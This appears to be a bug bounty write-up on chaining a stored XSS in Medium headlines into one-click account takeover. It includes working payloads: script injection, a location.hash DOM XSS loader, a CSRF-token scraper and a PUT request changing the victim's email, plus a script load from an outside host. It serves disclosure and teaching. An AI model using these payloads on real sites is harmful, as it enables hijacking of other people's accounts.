Medium 1-Click Full Account Takeover

Two days ago, I found a simple, limited XSS, which I developed into a one-click complete account takeover.

How did it start?

I was searching Google for XSS vectors and found a link to Medium’s page with XSS vectors. When I opened the link, I got XSSed, which made me curious to inspect the page further. I discovered that the headline was not being filtered. I registered an account and created a new story with the headline:

1
"><script>alert(1337)</script>

And I got:

As shown, I was granted XSS. I brought an XSS file from outside because the headline had a limited length. For my first attempt, I tried to bring an XSS file from another server, like https://xxe-me.esy.es/xss.js. Here’s how I did it: Here’s how I did it:

When I tried to open the page, nothing happened because there was a CSP.

What is CSP? 

CSP stands for Content Security Policy. 

It is a W3C specification offering the possibility to instruct the client browser from which locations and/or types of resources are allowed to be loaded. To define a loading behavior, the CSP specification uses “directives” where a directive defines a loading behavior for a target resource type. By (OWASP)

Medium’s CSP is: 

1
2
3
4
5
6
7
8
9
10
11
content-security-policy: default-src 'self'; connect-src https://localhost https://*.instapaper.com 
https://*.stripe.com https://getpocket.com https://medium.com:443 https://*.medium.com:443
 https://*.medium.com https://medium.com https://*.medium.com https://*.algolia.net https://cdn-static-1.medium.com 
 https://dnqgz544uhbo8.cloudfront.net 'self'; font-src data: 
 https://*.amazonaws.com https://*.medium.com https://*.gstatic.com https://dnqgz544uhbo8.cloudfront.net https://use.typekit.net 
 https://cdn-static-1.medium.com 'self'; frame-src chrome-null: 
 https: webviewprogressproxy: medium: 'self'; img-src blob: data: https: 'self'; media-src https://*.cdn.vine.co 
 https://d1fcbxp97j4nb2.cloudfront.net https://d262ilb51hltx0.cloudfront.net
 https://medium2.global.ssl.fastly.net https://*.medium.com https://gomiro.medium.com https://miro.medium.com https://pbs.twimg.com 
'self'; object-src 'self'; script-src 'unsafe-eval' 'unsafe-inline' 
about: https: 'self'; style-src 'unsafe-inline' data: https: 'self'; report-uri https://csp.medium.com

If you see the CSP, the script-src uses unsafe-inline without a nonce, which is why the page doesn’t prevent the XSS in the original page. It’s a common mistake, as Michele Spagnuolo and Lukas Weichselbaum mentioned at the HITB conference.

Though I found this, I didn’t stop there. I was thinking of creating a good PoC for stealing the CSRF token and making a request since the email change doesn’t require password confirmation. But wait, I couldn’t write a full script in the headline because the headline’s length is relatively short, and the single and double quotes were changed to Unicode. Nothing worked, so I went to sleep.

The next day, I checked Facebook and chatted with some friends about my problem. They gave me advices, but I needed something else. Then I got the idea to change the stored XSS to DOM XSS, and it was a great idea, though I wasn’t sure about it.

The token was on the same page; it’s called xsrfToken. Now time for some JavaScript :) For the headline name, I used:

1
"><script>document.write(decodeURIComponent(window.location.hash));</script>

The document.write writes the new PoC on the page, decodeURIComponent decodes the URL, and all of the new PoC will be in the window.location.hash.

I wrote this simple token finder and tested it locally.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<html>
<head>
 <script> 
function myFunction() { 
var str = document.body.innerHTML; 
var n = str.lastIndexOf('xsrfToken'); 
var result = str.substring(n + 12); 
if(result.length > 16){ result = result.substring(0,16); 
alert('Your token is ' + result);
}
}
</script>
</head>
<body>
xsrfToken":"HZuv9jqWJvnqO0pF"
<img src='x' onerror='myFunction()'> 
</body>
</html>

I used this to check the page for xsrfToken and show it locally in an alert box. Then I used it on the Medium website, and the img tag triggered the XSS.

PoC : https://medium.com/@abdullah.test1/script-src-goo-gl-9li8mf-script-img-onerror-myfunction-src-x-6c98f1e159ca# <script>function myFunction(){var str = document.body.innerHTML;var n = str.lastIndexOf('xsrfToken'); var result = str.substring(n + 12);if(result.length > 16) {result = result.substring(0,16); alert(result); }</script><img src=x onerror="myFunction()">

Works good! But after getting the token, I couldn’t send the request! The change request is sent through the PUT method, and SOP prevents sending the request from another origin. I needed to make the request from the current page, so I wrote the full PoC that sends a request to https://medium.com/me/email with JSON data to abdullah@gmail.com.

PoC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<script> function myFunction() {
 var str = document.body.innerHTML;
 var n = str.lastIndexOf('xsrfToken');
 var result = str.substring(n   12);
 if(result.length > 16) {result = result.substring(0,16); alert('Your token is ' +  result) };
 var xhr = new XMLHttpRequest();
 xhr.open('PUT', 'https://medium.com/me/email');
 xhr.setRequestHeader('Content-Type', 'application/json');
 xhr.setRequestHeader('X-XSRF-Token', result);
 xhr.onload = function() {
  if (xhr.status === 200) {
  alert('ok');
 } } ;
 xhr.send(JSON.stringify({"email":"abdullah@gmail.com"}));
} </script>
<img onerror="myFunction();" src=x>

And the PUT request worked, and the email was changed successfully!

I sent the full PoC and got a reply on the same day. Two days later, they contacted me and rewarded me with $100. I was disappointed, but I got a Medium t-shirt. Updated: I got Medium’s t-shirt :D

See the PoC video:

Conclusion

• Use a nonce in your CSP.
• Implement password confirmation for the email change mechanism.
• Ensure new features are secure.

That’s all. Thanks for reading. If you like this, you can follow me on Twitter at @Abdulahhusam.